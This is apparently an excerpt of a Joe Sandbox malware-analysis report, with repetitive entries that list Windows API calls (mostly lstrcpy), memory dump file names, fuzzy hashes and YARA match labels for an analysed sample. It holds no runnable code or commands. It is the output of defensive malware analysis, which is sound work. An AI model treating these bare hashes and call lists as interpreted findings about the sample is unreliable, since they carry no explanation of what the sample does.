                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Similarity
                                    • API ID: lstrcatlstrcpylstrlen
                                    • String ID: ------
                                    • API String ID: 3050337572-882505780
                                    • Opcode ID: a46d9ca17eb19bf4476e5ed91f088d93d1c5f105dc1610da41bcc3e37db9d2a8
                                    • Instruction ID: d543fb7267e51e4ad22036e34c80a9b44b930f3ff7c1859a2db553adb866b368
                                    • Opcode Fuzzy Hash: a46d9ca17eb19bf4476e5ed91f088d93d1c5f105dc1610da41bcc3e37db9d2a8
                                    • Instruction Fuzzy Hash: D7F0C9789017429FDB649FB6D848A27BAF9FF95705314882DAC9AC7324EB34D842CB50
                                    APIs
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                      • Part of subcall function 008C1410: lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D37CE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D37F7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D381D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D3843
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: e95f666f5a10a6d415b3c7fb42a5b3b412c422bb22f86a55032d97a5a966b0e9
                                    • Instruction ID: d7ec671eb1a067ef1749a689e8e1cf186b3db173066ab12718575ba65011fed4
                                    • Opcode Fuzzy Hash: e95f666f5a10a6d415b3c7fb42a5b3b412c422bb22f86a55032d97a5a966b0e9
                                    • Instruction Fuzzy Hash: D7121970A116018FDB68CF19C558B25B7E0FF44328B19C2AED849DB3A2D772DD82CB41
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7D14
                                    • std::_Xinvalid_argument.LIBCPMT ref: 008D7D2F
                                      • Part of subcall function 008D7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008D7DD8
                                      • Part of subcall function 008D7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008D7DF6
                                      • Part of subcall function 008D7DC0: std::_Xinvalid_argument.LIBCPMT ref: 008D7E11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: string too long
                                    • API String ID: 909987262-2556327735
                                    • Opcode ID: 9a5a7d3baf7a47950042fe32fa6ed5f53ddb9dfddea695be702e393b40092d28
                                    • Instruction ID: 73a4ad301d95ac3e326f42972f56d21a3439ad87446eb98e7d1f40be29fbc757
                                    • Opcode Fuzzy Hash: 9a5a7d3baf7a47950042fe32fa6ed5f53ddb9dfddea695be702e393b40092d28
                                    • Instruction Fuzzy Hash: 8931D6723086549FE7249E6CE880A7AF7EAFF91760B204B2BF146C7745E7719C4083A5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 008C6EB4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C6EBB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID: @
                                    • API String ID: 1357844191-2766056989
                                    • Opcode ID: a8116fde8d2ef7bfce7aad01d112ac484bda0a77c4e29ab38dce33c216a34c28
                                    • Instruction ID: 56cb2de248275378eee8ec2951cbc29fbfd21b29a765bd0482a55ca5bc4f8ca9
                                    • Opcode Fuzzy Hash: a8116fde8d2ef7bfce7aad01d112ac484bda0a77c4e29ab38dce33c216a34c28
                                    • Instruction Fuzzy Hash: F3216AB06106019BEB208B64D884FB773F8FB44705F44487CE946CB684FBB8E954CB51
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008E23CC
                                    • lstrlen.KERNEL32(00000000), ref: 008E2469
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008E24F0
                                    • lstrlen.KERNEL32(00000000), ref: 008E24F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 0fb36797e768866636e631012867bb9a71a7924b6899c989d11b85fd6b382827
                                    • Instruction ID: df568c639ef65096ed12ad822b1e12a6c6897c902066b03e8e563aa82887b145
                                    • Opcode Fuzzy Hash: 0fb36797e768866636e631012867bb9a71a7924b6899c989d11b85fd6b382827
                                    • Instruction Fuzzy Hash: 2381F0B0E002499BDB10CF95C844BAEB7B9FF85314F1881ADE508E7381EB759D42CB95
                                    APIs
                                      • Part of subcall function 008C1510: lstrcpy.KERNEL32(00000000), ref: 008C152D
                                      • Part of subcall function 008C1510: lstrcpy.KERNEL32(00000000,?), ref: 008C154F
                                      • Part of subcall function 008C1510: lstrcpy.KERNEL32(00000000,?), ref: 008C1571
                                      • Part of subcall function 008C1510: lstrcpy.KERNEL32(00000000,?), ref: 008C1593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1437
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1459
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C147B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C14DF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 349658508d81b27d3c4a415c17e58a83425abbe3146bff082d537ccca0bce7c6
                                    • Instruction ID: 2b5a203c15de5d59601f3b3707840d8ff346903b30ae20431cc8495cc25b8efb
                                    • Opcode Fuzzy Hash: 349658508d81b27d3c4a415c17e58a83425abbe3146bff082d537ccca0bce7c6
                                    • Instruction Fuzzy Hash: F1319374A01B029FDB68DF7AD598A66BBF5FF49700700492DA956C3B51DB30F811CB84
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 008E1581
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E15B9
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E15F1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008E1629
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 7f30af614f903268fb4ef1295337f148870c2fd1855482a49088cd5490a3af4e
                                    • Instruction ID: 1e3884d2316601300b120b0100a94de37629ca0b410ada63da68ab4d56e2eaac
                                    • Opcode Fuzzy Hash: 7f30af614f903268fb4ef1295337f148870c2fd1855482a49088cd5490a3af4e
                                    • Instruction Fuzzy Hash: 0C21B9B4601B429BDB24DF6AC458F27B7F9FF85700B044A2CA496C7B90DB34E851CB91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 008C152D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C154F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1571
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C1593
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 954bd2259618aa86abad9451bdafa4f995c8ac289f54730faf89c4dfe44529ec
                                    • Instruction ID: 7b03ce94588b4cee0b77003503645133abeaa949f798340cc32272805f5bbabf
                                    • Opcode Fuzzy Hash: 954bd2259618aa86abad9451bdafa4f995c8ac289f54730faf89c4dfe44529ec
                                    • Instruction Fuzzy Hash: 0711ECB4A11B029BDB249FB9D45CE27B7F8FF85701704462DA456C7B51EB30E811CB90